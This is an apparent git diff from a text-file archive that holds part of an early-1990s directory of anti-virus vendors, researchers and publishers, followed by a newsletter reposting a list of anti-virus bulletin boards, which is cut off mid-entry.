Agency, Japan) +Tel:03-3437-2301 +Fax:03-3437-5386 +3-1-38, Shibakoen, Minato-ku, Tokyo, 105 JAPAN + +Anthony Naggs +P O Box 1080, Peacehaven +East Sussex BN10 8PZ +Great Britain +Phone: +44 273 589701 +Email: (c/o Univ of Brighton) amn@vms.brighton.ac.uk or xa329@city.ac.uk +AV software due spring of 1993 + +National Computer Security Assn Jinbu (NCSA) +Michel E. Kabay, Ph.D., Director of Education +P.O. Box 509 Westmount +Montreal, Quebec +H3Z 2T6 CANADA + + +(514) 931-6187 +fax 514-931-0878 +75300.3232@compuserve.com +franchise security organization + +National Institute of Standards and Technology (NIST) +Computer Security Division +A-216 Technology +Gaithersburg, MD 20899 USA +301-975-3359 +Fax: 301-590-0932 +BBS: 301-948-5717 +EMail: csrc@nist.gov +Personnel and email addresses: + Dennis D. Steinauer, DSteinauer@nist.gov + Lawrence Bassham, LBassham@nist.gov + W.T. Polk, WPolk@nist.gov + John Wack, JWack@nist.gov + Marianne Swanson, marianne_swanson@nist.gov (BBS Sysop) + +Nemesis +Am Rain 8b +D-7512 Rheinstetten 2 +Karlsruhe, Germany +Sparkasse Ettlingen +BLZ 660 512 20 +Kto. 135 66 33 +Virus Help Service +49-721-821355 Sysop: Robert Hoerner Fido 2:241/7518 +Virus Research Center +49-721-28780 Sysop: Mirko Ketterer Cosysop : Christian Sy Fido 2:241/7516 +Nemesis activity monitor + +NetLink Online Communications +San Diego CA +Kevin Marcus +(619) 435-6181 +BBS: (619)/457-1836 +tck@netlink.cts.com + +Netpro Computing +Scottsdale, AR +602-998-5008 +800-998-5090 +ScanMaster by McAfee, cf McAfee, Parsons et al + +Network-1 Inc. +PO Box 8370 +L.I.C., NY 11101 +800-NETWRK1 +718-932-7599 +Fax: 718-545-3754 +Check-4-Virus for VMS $495. + +NetZ Computing Ltd. +Israel +V-Care Antivirus Expert System (PC) +marketed in the US by Sela Consultants Corporation + +Nighthawk Electronics Ltd. +P. O. Box 44 +Saffron Walden +Essex CB11 3ND +UK +(0799) 40881 +Fax: (0799) 41713 + +Norman Defense Data Systems Inc. +2775-B Hartland Road +Falls Church, VA 22043 +703-573-8802 +Fax: 703-573-3919 +BBS: 703-573-8990 +norman@digex.com +formerly +International Computer Security Association (ICSA) +National Computer Security Association (NCSA) +Suite 33, 5435 Connecticut Avenue NW +Washington, DC 20015 +USA +David Stang +800-488-4595 +202-364-8252 +fax: 202-364-1320 +BBS: 202-364-0644 +75300.3104@CompuServe.COM (Charles Rutstein) +75300.2673@CompuServe.COM (David Stang) +Virus News and Reviews journal +"Executive Guide to Computer Viruses" ($24.95) and various publications +Programs - Virus Analysis Toolbox, ViruSchool and V-Base + +John Norstad +Academic Computing and Network Services +Northwestern University +2129 Sheridan Road +Evanston, IL 60208 USA +j-norstad@nwu.edu +Disinfectant for Mac - archived at ftp.acns.nwu.edu (129.105.113.52) + +Northbank Corporation +Richmond, VA +Guard Card + +Ontrack Computer Systems Inc. +6321 Bury Dr. +Eden Prairie, MN 55346 +USA +612-937-1107 +Steve Hill +Head of Anti-Virus research +Bob Bower, sales, ext. 234 +1-800-752-1333 +Ciprico, Inc. Plymouth, MN 55441 +samurai@cipric.mn.org (Steve A. Hill) +cynic!van-bc!uunet!rosevax!cipric!samurai +Dr. Solomon's Antivirus Toolkit + +Orion Microsystems +PO Box 128 +Pierrefords, Quebec +H9H 4K8 +514-626-9234 +Ntivirus + +Lars-Erik 0sterud +0kriveien 39 +N-1349 Rykkinn +Norway ++47-2-131571 +ABK-BBS +47-2-132659 +larserio@ifi.uio.no (User unknown) +Protect6 (Atari) + +Oxford University Press +70 Wynford Drive +Don Mills, Ontario +M3C 1J9 +or +200 Madison Avenue +New York, NY 10016 +USA +212-679-7300 +Managing Computer Viruses, Luow/Duffy, 1992 + +Panda Systems +801 Wilson Road +Wimington, DE 19803 +USA +800-727-2632 +(302)764-4722 +Dr. Panda Utilities, BEARTRAP, Panda Pro - Anti-Viral Software +PSKane@Dockmaster.ncsc.mil or 0003607248@mcimail.com + +PanSoft Software & Support, +P.O. Box 12-292, +Christchurch, +NEW ZEALAND. +author Peter Johnson, +52A Dyers Pass Road, +Christchurch, 2, +NEW ZEALAND +phone (064) 3 3322-727 +IMMUNISE & SCANBOOT + +Parsons Technology +375 Collins Road NE +Cedar Rapids, IA 52402 +One Parsons Dr. +PO Box 100 +Hiawatha, IA 52233-0100 +USA +800-223-6925 +319-395-9626 +Virucide + +PC Guardian Security Products +118 Alto Street +(1133 E. Francisco Blvd., Suite D?) +San Rafael, CA 94901 +Phone: 415-459-0190 +Fax: 415-459-1162 +Noah Groth, President +Dan Marley 800-288-8126 +Brett Fhuere 800-882-7766 +Virus Prevention Plus, Data Security Plus, cf Frisk + +PC Information Group +1126 East Broadway +Winona, MN 55987 +800-321-8285 or 507-452-2824 +SysLaw 2nd ed., Lance Rose (elrose@well.sf.ca.us) and Jonathon Wallace, 1992 + +Penn State University +Penn State Virus Committee +Chair - Gerry Santoro - 814-863-7896 + +A. Padgett Peterson, Computer Network Security +Orlando +POB 1203 +Windermere, FLA, 34786 +(407)352-6007 +Fax: (407)352-6027 +cynic!van-bc!uvs1.orl.mmc.com!tccslr.dnet!padgett +padgett%tccslr.dnet@uvs1.orl.mmc.com [host unknown] +padgett%tccslr.dnet%mmc.com@cunyvm.cuny.edu +cynic!van-bc!uvs1.orl.mmc.com!tccslr.dnet!padgett@dinl.den.mmc.com +uvs1.orl.mms.com!padgett%tccslr.dnet@cs.utexas.edu +* (407)356-4054, 6384 work, (407)356-2010 FAX (MM, do not publish) * +DISKSECURE, SafeMBR, FixMBR + +PickAxe Media +193 Bath Rd +Kirawee 2232 +N.S.W. +Australia +Bruce Hodge ccdbh@cc.newcastle.edu.au +"Rid me of this Virus" $15.00 + +Pittsburgh Computer Virus Specialists +PO Box 19026 +Pittsburgh, PA 15213 +BBS: 412/481-5302 +Tele: 412/481-3505 +FAX: 412/481-8568 +AntiVirus consultation services, Subscription FAX service + +PKWare, Inc. +7545 North Port Washington Road +Glendale, WI 53217-3442 +USA +Douglas Hay 75300.730@compuserve.com +PKZIP, PKSFX-File compression utilities with encryption option + +Jonathan Potter +P.O. Box 289 +Goodwood, SA 5034 +Australia +(08) 2932788 +ZeroVirus for Amiga + +Prentice Hall, Inc./Brady +113 Sylvan Avenue +Englewood Cliffs, NJ 07632 +(515) 284-6751 +FAX (515) 284-2607 +11711 N. College Ave. +Carmel, IN 46032-9903 +800-428-5331 +Computer Viruses and anti-virus warfare, Hruska, 1990 + +Prime Factors +1470 East 20th Avenue +Eugene, OR 97403 +USA +VI-Raid Anti-Viral Software + +Protech Services +P. O. Box 325 +Fresh Meadows, NY 11365 +718-321-7908 +fax: 718-961-8612 +IDE Stealth Card + +PYRAMID Development Corp +800-759-3000 +20 Hurlbut Street, +West Hartford, CT 06110 (moved to:) +(Mergent?) +70 Inwood Rd +Rocky Hill, CT 06067-3441 +203-953-9832 +Fax: 203-953-3435 +PC/DACS retail $249.00. + +Quaid Software Ltd. +45 Charles Street East +Toronto, ON M4Y 1S2 +416-961-8243 +Antidote-Anti-Viral Software +product not available + +Remote Technology +3612 Cleveland Ave. +St. Louis, MO 63110 +Immunize + +RG Software Systems Inc +6900 East Camelback Road +Suite 630 +Scottsdale AZ 85251 ++1 602 423 8000 +FAX (602) 423-8389 +BBS (602) 970-6901 +Ray Glath <76304.1407@CompuServe.COM> +Vi-Spy, Virus Bulletin subscriptions (PC Tracker) + +S&S International Ltd. +Berkley Court, Mill Street +Berkhamsted, Herts. HP2 4HB +England +Phone: +44 442 877 877 +Fax: +44 442 877 882 +BBS: +44 494 724 946 + 442 877 883 +E-Mail: Dr. Alan Solomon +sands@cix.compulink.co.uk +Dr. Solomon's Anti-Virus Toolkit +Vendor: Markt & Technik Software Partners GmbH +Hans-Pinsel_Strasse 9b +8013 Haar +Germany +Phone: +49 89 46 09 00 92 +Fax: +49 89 46 09 00 95 +vendor: Ontrack Computer Systems +6321 Bury Drive +Eden Prairie, MN 55346 +USA +(800) 752-1333 +(612) 937-1107 +fax: (612) 937-5815 + +SafetyNet +14 Tower Drive +East Hanover, New Jersey +908-851-0188 +800-851-0188 +fax: 908-276-6575 +safetynet@attmail.com +Drive-In Antivirus, Stoplight, VirusNet (contains F-Prot, cf Frisk) + +St. Martin's Press +175 Fifth Ave. +New York, NY 10010 +USA + Computer Viruses, Worms, Data Diddlers, Killer Programs and Other Threats + to Your System: what they are, how they work and how to defend your + PC, Mac or mainframe, John McAfee and Colin Hayes, 1989, 0-312-02889-X + +Luis Bernardo Chicaiza Sandoval +Phone: (91)2 02 23 78 +Universidad de los Andes Bogota, Colombia +mail address: +Compucilina US$70, adds self check module +review copies not available + +Tommy Pedersen +SECTRA +Teknikringen 2 +S-583 30 Linkoping +SWEDEN +Telephone: +46 13 235214 + +46 13 235200 +FAX: +46 13 212185 +Telephone: +46 13 282369 + FAX: +46 13 289282 +tommyp@sectra.se +tommyp@isy.liu.se +TCell unix change checker + +Security Dynamics Inc. +Cambridge, MA +USA +617 547 7820 +mail undeliverable +dial in security systems + +Securkey Systems Inc. +1674 Eglington Ave. West +Toronto, Ontario +M6E 2H3 +(416) 784-2883 +fax: (416) 784-0338 +telecommunications encryption interface, DES/MAC keys + +Sela Consultants Corp. +InVircible + +Alexander Shehovtsov +(044) 266-70-28 (9:00 - 18:00 Kiev, Ukraine) voice +als@vl.ts.kiev.ua +FidoNet 2:463/30.5 or 2:463/34.4 +RLOCK software write protection + +Jeffrey S. Shulman +PO Box 50 +Ridgefield, CT 06877 +VirusBlockade, VirusDetective (Mac) + + +Silver Oak Systems +IronClad + +Simon & Shuster +330 Steelcase Road +Markham, Ontario +L3R 2M1 +or +15 Columbus Circle +New York, NY 10023 +Computer Viruses and anti-virus warfare, Hruska, 1990 +Cyberpunk, Hafner/Markoff, 1991 + +Softhansa GmbH +AntiVirus 1.0E (Mac) + +Software Directions +1572 Sussex Turnpike +Randolph, NJ 07869 +201-584-8466 +SoftSafe + +Software Systems +2300 Computer Avenue, Suite 15 +Willow Grove, PA 19090 +Disk Watcher + +Sophco +P.O. Box 7430 +Boulder, CO 80306 +USA +Vaccinate-Anti-Viral Software + +Sophos Limited/Virus Bulletin Ltd. +21 The Quadrant +Abingdon Science Park +Abingdon, Oxfordshire OX14 3YS +UK ++44-235-559933 ++44-235-555139 +fax: (0235) 559935 +oxcompl@vax.ox.ac.uk Edward Wilding or Richard Ford +virusbtn@vax.ox.ac.uk +Vaccine Anti-Viral Software, also Virus Bulletin +"Survivor's Guide to Computer Viruses", 1993, 0-9522114-0-8, UK#19.95 + +Springer-Verlag +175 Fifth Ave. +New York, NY 10010 +212-460-1500 +800-777-4643 +or +8 Alexandra Road +London SW19 7JZ +44-81-947 5885 +"A Pathology of Computer Viruses" by David Ferbrache of the UK Defense Research +Agency, 1992, ISBN 3-540-19610-2 and 0-387-19610-2, $39.50 300 pages +"PC Viruses: Detection, Analysis and Cure", Solomon, Alan, 1991 + +Star Technologies (UK) Ltd +Passfield Enterprise Centre +Liphook +Hants +GU30 7SB +Greg Watson +Internet : gw@startech.demon.co.uk +Voice : 0428 751091 +Fax : 0428 751117 +UNIX virus checker (Intel/BIOS BSIs only?) + +Stiller Research +2625 Ridgeway St. +Tallahassee, FL 32310 +904-575-7884 (fax also attached) +Advanced Support Group (ASG) at 1-900-88-HELP8 (1-900-884-3578) +or 314-256-3130 +72571.3352@compuserve.com +Runway BBS (215) 623-6203 2400 baud + (215) 623-4897 HST + (215) 623-6845 V.32 +Integrity Master change detection software + +Peter Stuer +Kauwlei 21 +B-2550 Kontich +Belgium +Peter.Stuer@p7.f603.n292.z2.FidoNet.Org +BootX (Amiga) + +Swarthmore Software Systems +526 Walnut Lane +Swarthmore, PA 19081 +USA +Bombsquad, Check-4-Bomb Anti-Trojan software + +Sybex +2021 Clallenger Dr., #100 +Alameda, CA 94501 +USA +Computer Virus Protection Handbook, Colin Hayes, 1990, 0-89588-696-0 + +Sydex BBS +Eugene, Oregon +USA +503-683-1385 +Prune v2.1 utility + +Symantec/Peter Norton +10201 Torre Avenue +Cupertino, CA 95014 +USA +408-253-9600 +800-343-4714 +800-441-7234 +408-252-3570 +416-923-1033 +Technical Support: 213-319-2020 +Virus Newsline: 408-252-3993 +Virus Faxline: 213-575-5018 +BBS: 408-973-9598 +Fax: 408-253-4092 and 252-4694 +Telex: 9103808778 +Compuserve: NORUTL +Jimmy Kuo cjkuo@ccmail.norton.com +Norton AntiVirus and Norton Utilites +SAM (Symantec AntiVirus for Macintosh) + +TAB/Windcrest Books +Blue Ridge Summit, PA 17294-0850 +USA +Computer Viruses, Jonathon L. Mayo, 1989, 0-8306-3382-0 + +Tacoma Software Systems +7526 John Dower Road W. +Tacoma, WA 98467 +VIRSTOP 1.05 + +T.C.P. Techmar Computer Products +97 - 77 Queens Blvd. +Rego Park, NY 11374 +USA +(moved, no forwarding address 920814) +800-922-0015 (not available from Canada) +718-275-6800 +fax: 718-520-0170 +70761.2721@Compuserve.com + IRIS Antivirus (cf Fink), Antivirus Plus (purported "AI vaccine"), VirAway + scanner + +Steve Tibbett +613-731-5316 +BBS 613-731-3419 +s.tibbett on BIX +VirusX for Amiga + +Thecia Systems Ltd, +Lasada House, +BRIGHTON +BN1 4ED +United Kingdom +Tel: +44 273 623500 +Fax: +44 273 623700 +Eliminator +see also ICVI, BCVRC +no longer at this address + +Harry Thijssen +P.O. Box 662 +6400 AR Heerlen +The Netherlands +INFOdesk The Hague FIDO 2:512/2.7 +31-70-3898822 +HTScan scanner + +Thuna Technologies +Upgrades, Etc. +2432-A Palma Drive +Ventura, Ca. 93003-5732 +Sales Department: (805)650-2030 + (800)955-3527 +Acounting: (805)650-2046 +Customer Service/Returns(805)650-2042 +Technical Support: (805)650-2044 +FAX: (805)650-6515 +MR. BIOS + +Tomauri Inc. +30 West Beaver Creek Road, Unit 13 +Richmond Hill, Ontario +L4B 3K1 +416-886-8122 +Telecopier: 416-886-6452 +PC Guard - password protection board, also for Mac + +Transfinite Systems Company, Inc. +PO Box N, MIT Post Office +Cambridge, MA 02139 +617-969-9570 +Ft. Knox (Mac) + +Trend Micro Devices Inc. +2421 W. 205th St., #D-100 +Torrance, CA 90501 +USA +310-782-8190 +fax: 310-328-5892 +BBS: 310-320-2523 +800-228-5651 +PC-cillin - program change detection hardware/software + +Tripwire +genek@mentor.cc.purdue.edu +Tripwire UNIX security software + +University of Cincinnati +Dep't. of Computer Engineering +Mail Loc. 30 - 898 Rhodes Hall +Cincinnati, OH 45221-0030 +USA +Cryptographic Checksum-Anti-Viral software + +usrEZ +18881 Von Karman Ave., Suite 1270 +Irvine CA 92715 +714-573-2548 +ultraSECURE for Mac + +Vacci Virus +84 Hammond Street +Waltham, MA 02154 +Voice: 1-617-893-8282 +FAX : 1-617-969-0385 +distributes Hoffman Virus Summary Document, other products unknown + +Van Nostrand Reinhold +115 Fifth Ave. +New York, NY 10003 +The Computer Virus Crisis, Fites/Johston/Kratz, 1989, 0-442-28532-9 +fites@qucis.queensu.ca +Rogue Programs, edited Lance Hoffman, 1990, ISBN 0-442-00454-0 +hoffman@gwusun.gwu.edu hoffman@seas.gwu.edu + +Vancouver Institute for Research into User Security +3118 Baird Road +North Vancouver, B. C. +V7K 2G6 +604-984-4067 (Robert Slade, home) +virus research archives, seminars, vendor contact list, AV BBS list, weekly +columns, product reviews, consulting, V.I.R.U.S. Weekly, Monthly and BBS feed +(see CyberStore) + +VDS Advanced Research Group +P.O. Box 9393 +Baltimore, MD 21228 +(410) 247-7117 +Tarkan Yetiser tyetiser@ssw02.ab.umd.edu +Brian Seborg seborg@csrc.ncsl.nist.gov +VDS 2.1 change detector and scanner + +Frans Veldman +ESaSS B.V. +P.o. box 1380 +6501 BJ Nijmegen +The Netherlands +Tel: 31 - 80 - 787 881 +Fax: 31 - 80 - 789 186 +Data: 31 - 85 - 212 395 + (2:280/200 @fidonet) +bartjan@blade.stack.urc.tue.nl (Bartjan Wattel) +c/o Jeroen W. Pluimers +P.O. Box 266 +2170 AG Sassenheim +The Netherlands +work: +31-71-274245 9.00-17.00 CET +home: +31-2522-20908 19:00-23:00 UTC +email: jeroenp@rulfc1.LeidenUniv.nl + Jeroen_Pluimers@f256.n281.z2.fidonet.org + 100013.1443@compuserve.com +or Calmer Software Services + 361 Somerville Rd + Hornsby Heights NSW 2077, AUSTRALIA. + Ph +61 2 4821715, BBS +61 2 4821716 +or +P.O. Box 527 +Dagsboro, DE 19939 +(302) 732-3105 [voice] +(302) 732-3105 [fax] +(302) 732-6399 [BBS] +Thunderbyte Utilities, Thunderbyte card + +John Veldthuis +21 Ngatai Street +Manaia, Taranaki +New Zealand +Phone (0624) 8409 +FIDO 3:771/400.0 +johnv@tower.actrix.gen.nz +virus_checker for Amiga (archived at ab20.larc.nasa.gov) + +Viagrafix +PC Virus (video) + +A. & Z. Vidovic +Tour Panoramique +Duchere +69009 Lyon +France +Chasseur II (Atari) + +Villa Crespo Software +1725 McGovern Street +Highland Park, IL 60035 +708-433-0500 +Fax: 708-433-1485 +Failsafe Computer Guardian + +Mikael Larsson +Virus Help Centre +Box 7018 +S-81107 SANDVIKEN +SWEDEN +Phone : +46-26 100518 +Fax : +46-26 275720 +BBS : +46-26 275710 (HST) +FidoNet : 2:205/204 +VirNet : 9:461/101 +SigNet : 27:5346/108 (soon) +Email : vhc@abacus.hgs.se + +Virus News International. +Berkley court, Millstreet, Berkhamsted, Hertfordshire, HP4 2HB, +England. +Tel. +44-442-877877 + +Virus Security Institute +PSKane@dockmaster.ncsc.mil +VSI conference + +Virus Test Center, Faculty for Informatics +University of Hamburg +Schlueterstr. 70, D2000 Hamburg 13, FR Germany +Prof. Dr. Klaus Brunnstein, Simone Fischer-Huebner +Contact: Margit Leuschner (VTC, secretary) +Tel: (040) 4123-4158 (KB), -4175 (SFH), -4162 (ML) +Email (EAN/BITNET): brunnstein@rz.informatik.uni-hamburg.dbp.de +Computer Virus Catalog (MS-DOS, Mac, Amiga and Atari) + +VIRUS-L/comp.virus +Kenneth R. van Wyk +Moderator VIRUS-L/comp.virus +VIRUS-L submissions should go to: VIRUS-L@Lehigh.Edu +Division Chief, Operations +Center for Information Systems Security (CISS) +Defense Information Systems Agency (DISA) +krvw@Agarne.IMS.DISA.MIL + +Vision Fund +10 Spruce Lane +Ithaca, NY 14850 +Robert Woodhead +Interferon (Mac) + +Western Digital Corporation +8105 Irvine Center Drive +Irvine, CA 92716 +714-932-5000 +714-932-6250 Letty Ledbetter +Robert McCarroll, Product Manager, Systems Logic Group +714-932-7013 Terry Walker (and Robert Lee, developer) fax: 714-932-7097 +Mark Levitt fax: 714-932-7098 +Benjamin Group (marketing) +Suite 480, 100 Pacifica Ave. +Irvine, CA 92718 +714-753-0755 (Erin Jones, Sari Barnhard and Carolyn Fromm) fax: 714-753-0844 +Immunizer "concept" + +George R. Woodside +5219 San Felicaino Drive +Woodland Hills, CA 91364 +USA +(818) 348-9174 +76537.1342@compuserve.com +GEnie: G.WOODSIDE +woodside@ttidca.com (Host Unknown) or ..!{philabs|csun|psivax}!ttidca!woodside +VKILLER for Atari ST + +Woodside Technologies +474 Potrero Ave. +Sunnyvale, CA 94086 +408-733-9503 +Fortress UNIX antiviral + +Jim Wright + +Maintains and distributes list of anti-viral archive and ftp sites + +XTree Co. +4330 Santa Fe Road +(4115 Broad Street, Building 1?) +San Luis Obispo, CA 93401-7993 +USA +800-477-1587 +805-541-0604 +fax: 805-541-4762 +BBS: 805-546-9150 +75300.2266@Compuserve.com +ViruSafe - activity monitor, scanner and "bait" program, cf EliaShim + +Zortech Inc. +366 Massachusetts Ave. +Arlington, MA 02174 +Check-It + diff --git a/textfiles.com/virus/cnws2005.vir b/textfiles.com/virus/cnws2005.vir new file mode 100644 index 00000000..5f4d517a --- /dev/null +++ b/textfiles.com/virus/cnws2005.vir @@ -0,0 +1,665 @@ + +CrisNews #2 - 05/01/94 + +---------------------------------------------------------------------------- +We can thank Robert for making this AV BBS list public for us all to have :) +---------------------------------------------------------------------------- + +The V.I.R.U.S./Virus Doctor BBS List + +A number of those who have access to viral information or antiviral software +only through commercial systems (or long distance calls) have requested +listings of "local" access to antiviral sources. This list is an attempt to +provide such information. Additions and corrections are solicited to help make +this a more useful reference source. + +For sorting purposes the wide variety of bracket, slash, space and hyphen +placement have been replaced with the European standard "global" area codes. +I have used hyphens instead of blank spaces when separating the "global", +"country" and "city" codes. Every phone number begins with the global area +code; this code is "1" for USA and Canada. To prevent misinterpretation, the +global area code is preceded with a "+" sign, and delimited by a hyphen. The +(national) area code is delimited from the local phone number by another +hyphen. (Thanks to Otto Stolz for his assistance.) + +In order to avoid line wrap on Fidonet mail readers, the "node number" has been +"right justified" at 75 columns. For those on the Internet, it is possible to +send mail to these systems. The node number is in the format +:/ and can be converted to an Internet address as +user.name@f.n.z.fidonet.org, so that Rob Slade may be reached +at The Cage (1:153/733, see "+1-604") as Rob.Slade@f733.n153.z1.fidonet.org. +VirNet sites can be addressed as +Fname.Lname@f.n.z.virnet.bad.se at the moment. + +Information included, where available, is name of system, name of sysop, city, +province/state/country, information carried and Fidonet address. If a product +is associated, that is included as well. + +Key: + +AM = Amiga AT = Atari MC = Macintosh PC = MS-DOS +Fidonet: VIRINF = VIRUS_INFO VIR = VIRUS WRN = WARNINGS VNT = VirNet +Files archived: CVP = Computer Viral Programs column RVW = Antiviral reviews + +Where verification is possible, the "node number" is followed by a "V" and the +initials of the reviewer. + + ++1-201-3401340 The Quill & Inkpot BBS, Garfield NJ (1:2604/407) ++1-201-3852874 Menti's Bay, Dumont NJ VIR (1:107/521) ++1-201-4847265 THE DIGITAL ABYSS, Newark NJ VIR (1:2605/121.0) ++1-201-5799387 E.o.D. Systems VIRINF (1:2606/213) ++1-202-3640644 Int'l Computer Security Association (ICSA) BBS ++1-203-2281766 Starfleet Technical Support, Columbia CT (1:320/296) ++1-203-2611476 Xanth BBS, Easton CT (1:141/465) ++1-203-3842453 The Wacko Board, Fairfield CT (1:141/415) ++1-203-4498642 The Rx BBS, Groton CT VIRINF (1:320/448) ++1-203-5285831 Warrior BBS VIRINF (1:142/831.0) ++1-203-5993970 Our House VIRINF (1:320/128.0) ++1-205-4423078 Southern Nights BBS, Gadsden AL (1:373/6) ++1-205-4792327 The Intrepid BBS, Mobile AL VIR (1:3625/467.0) ++1-205-6530240 The CADD Station, Theodore AL (1:3625/459) ++1-205-7448546 Channel 8250, Birmingham AL VIRINF ++1-205-9437530 Gulf Coast Net VIRINF (1:3625/443) ++1-205-9801089 Deep Space 9 VIRINF (1:3602/45) ++1-206-2449661 Top Hat BBS WRN (1:343/40) ++1-206-4318270 The Dragon's Eye BBS VIRINF (1:343/116.116) ++1-206-5222263 SeaBIN BBS, Seattle WA VIRINF (1:343/89) ++1-206-581APPLE The right place, Tacoma WA MAC (1:138/131) ++1-206-5825579 Awakening BBS, Tacoma WA VIRINF (1:138/102) ++1-206-6721198 The French Connection, Edmonds WA (1:343/45) ++1-206-7711730 The French Connection, Edmonds WA (1:343/45) ++1-206-7757983 Pioneers BBS, Safe Hex Int'l VIRINF (1:343/54.0) ++1-206-7757983 Michael Arends P.O. Box 1531 Lynnwood, WA 98046-1531 ++1-206-7802011 Quicksilver, Bainbridge Is WA VIRINF (1:350/201) ++1-206-8346789 Camas Chatter Box BBS (1:105/123) ++1-206-9449634 The Open Window BBS VIRINF (1:105/130) ++1-212-2556656 City People BBS, New York NY VIR (1:278/720) ++1-212-5198042 Stargate BBS, New York NY VIR (1:278/714) ++1-212-8896438 Software Concepts Design, Ross Greenburg Flushot, VIRx ++1-214-2381805 Master Control, Dallas TX (1:124/5107) ++1-214-3937090 Central BBS, TX (8:930/21) ++1-214-4165508 Galactic Archives, Carrollton TX (1:124/8009) ++1-214-4926565 User-To-User VIR RIME (1:124/6300) ++1-214-5788774 Mega-Sys OS/2 BBS, Plano TX VIRINF (1:124/5119) ++1-214-5790886 The WySiWyG BBS VIRINF (1:124/5132) ++1-214-6693561 Flash BBS, Richardson TX (1:124/7020) ++1-214-7278028 The Desktop BBS, Allen TX VIRINF (1:124/5133.4501) ++1-214-8815919 The Quad C, Collin Cty Comm College, Plano TX (1:124/7016) ++1-215-3689662 Stingray BBS VIRINF (273/728.1) ++1-215-4265596 Klingon Bird of Prey, Robt J Ferguson VIRINF (1:273/935) ++1-215-4439434 DSC (Datamax/Satalink Connection) VIRINF (1:273/203) ++1-215-6234897 Runway BBS, Stiller Research Integrity Master ++1-215-6236203 Runway BBS, Stiller Research Integrity Master ++1-215-6236845 Runway BBS, Stiller Research Integrity Master ++1-215-8550401 The Keep BBS, Lansdale PA VIRINF (1:273/731) ++1-216-3973068 JCUPCB, John Carroll Univ VIRINF (1:157/555.0) ++1-216-6681829 The Hard Drive Cafe, Akron OH (1:157/619) ++1-216-6788336 Akron Info & Party WRN (1:157/617) ++1-216-7528134 Certus International ++1-216-9423876 Analytical Engine BBS VIRINF (1:157/554) ++1-219-2348004 Treasure Chest ML-TBBS, South Bend IN VIR (1:227/3) ++1-219-2732431 VFR S Gordon VIRINF VIR WRN NET INT (9:101/101)(1:227/190) ++1-301-8635312 The Combat Zone (1:2612/10) ++1-301-9485717 National Institute of Standards & Technology (NIST) ++1-302-7326399 Thunderbyte USA, Dagsboro DE VIRINF/VIR (1:150/520) ++1-302-8460632 Southern Cross, Delmar DE VIRINF (1:150/410) ++1-302-9341323 Taurus BBS, Millsboro DE VIRINF (1:150/300) ++1-302-9341959 Taurus BBS, Millsboro DE (1:150/300) ++1-303-6517745 The Eighth Dimension (1:104/118.0) ++1-303-6660304 The Circuit Board Inc, Lafayette CO (1:104/117) ++1-303-7794253 The Vault BBS, Littleton CO (1:104/332) ++1-303-9629536 Computer Security BBS VIR (1:306/30) ++1-304-4422377 Silent Death BBS ++1-304-4806083 AIS, US Treasury CSB, Kim Clancy clancy@csrc.ncsl.nist.gov ++1-304-7667842 Project Enable, the disability resource (1:279/14) ++1-305-2211571 Ramblin' Roots, Miami FL (1:135/54) ++1-305-4240465 Marquee/2 egobashe@cybernet.cse.fau.edu DPROT (1:369/83) ++1-305-9446271 The Jailhouse, North Miami FL (1:135/34) ++1-306-9228415 Computer Answers, Prince Albert SK VIRINF (1:140/74) ++1-306-9228415 Gateway to Balumnia, Prince Albert SK VIR (1:140/138) ++1-306-9563383 The Data Dump HACK Report (1:140/12) ++1-309-3876690 Zeller East, Groveland IL (1:232/43) ++1-309-6859462 Live Wire III BBS VIRINF (1:232/27) ++1-310-3202523 Trend Micro Devices Inc PC-cillin ++1-310-3704113 Long_Island RB VIR (1:102/138) ++1-310-5455146 Ursa Major BBS, Scott Robb VIR (1:102/128) ++1-310-9433115 The Flying Circus VIR (1:102/438) ++1-310-9485919 Helping Hands, Santa Fe Springs CA (1:102/433) ++1-310-9858737 Cal State Long Beach (University BBS) ++1-312-4042824 WorkStations Unlimited, Chicago IL VIRINF (1:115/404) ++1-313-4788922 CDS BBS, Livonia MI (1:120/234) ++1-313-5487979 The Treasure House BBS VIRINF (1:120/613) ++1-313-9525438 Terox BBS, Troy MI (1:120/324) ++1-313-9692974 Int'l Network Security Association (INSA) (1:120/336) ++1-313-9692974 Atlantis, Oxford MI VIRINF (1:120/336) ++1-314-4430319 Planet ><, Columbia MO (1:289/5) ++1-314-9655296 Cheswick's, St Louis MO (1:100/375) ++1-315-4464150 The Reef, Syracuse NY (1:260/338) ++1-315-8654070 PowerLine BBS, Marcy NY VIRINF (1:2609/7) ++1-316-2213276 9th & Main, Winfield KS VIRINF (1:291/21) ++1-318-2337812 Garsand Biomedical, Inc. VIR (1:3803/9) ++1-318-3435882 Kittens BBS1, Monroe LA VIR ++1-318-4749892 Middle Earth, Lake Charles LA (1:3807/4) ++1-319-3379878 Icarus VIRINF (1:283/657) ++1-401-3646343 The Razors Edge, Richmond RI VIRINF (1:323/401.0) ++1-403-2400807 InterLink, Calgary AB VIR (1:134/93) ++1-403-2535996 ECS Net, Calgary AB (1:134/72) ++1-403-2867545 The Messhall, Calgary AB (1:134/73) ++1-403-3279731 The Terminal BBS, Lethbridge AB VIRINF (1:358/17) ++1-403-4843954 Synectics, Edmonton AB VIRINF (1:342/72) ++1-403-6862550 Rascal BBS, Calgary AB (1:134/122) ++1-403-7439330 NMD Maximus, Fort McMurray AB (1:3402/6) ++1-403-7916937 Arsenal of Freedom-OS/2, Fort McMurray AB (1:3402/19) ++1-403-8243019 The Sailboard, Nobleford AB VIR (1:358/25) ++1-404-3250122 Engineering Services BBS, Decatur GA (1:133/405) ++1-404-4438693 SpacePort Atlanta (1:133/524.0) ++1-404-5181356 Shelter From The Storm VIRINF (1:133/115) ++1-404-8795985 Atlanta PCUG, Atlanta GA ++1-405-2480528 The Bargain BBS, Lawton OK (1:385/17.0) ++1-405-3240943 Aloha BBS VIR (1:147/47) ++1-405-3570478 Good News II Carl Wilson c_w@lawton.lonestar.org Lawton OK ++1-405-4473211 Mann's Solutions VIRINF (1:147/1033.0) ++1-405-5368616 Toyz BBS, Lawton OK VIRINF (1:385/23) ++1-405-5369582 Tech Term BBS, Lawton OK VIRINF (1:385/18) ++1-405-7825951 J & J BBS, Mangum OK VIRINF (1:385/24.0) ++1-406-2843120 PC-Montana BBS, VIRINF (1:3400/26) ++1-407-2920485 Challenger BBS VIRINF VIR (1:363/175) ++1-407-6427426 The Slipped Disk, Lantana FL (1:3638/5) ++1-407-6879355 My Cozy Kitchen BBS VIRINF (1:3609/16) ++1-407-8478990 The Noble House BBS, Kissimmee FL VIRINF (1:3633/36) ++1-408-2440813 Patricia M. Hoffman Virus Summary Document ++1-408-4312275 Ashton-Tate/Borland (refer from 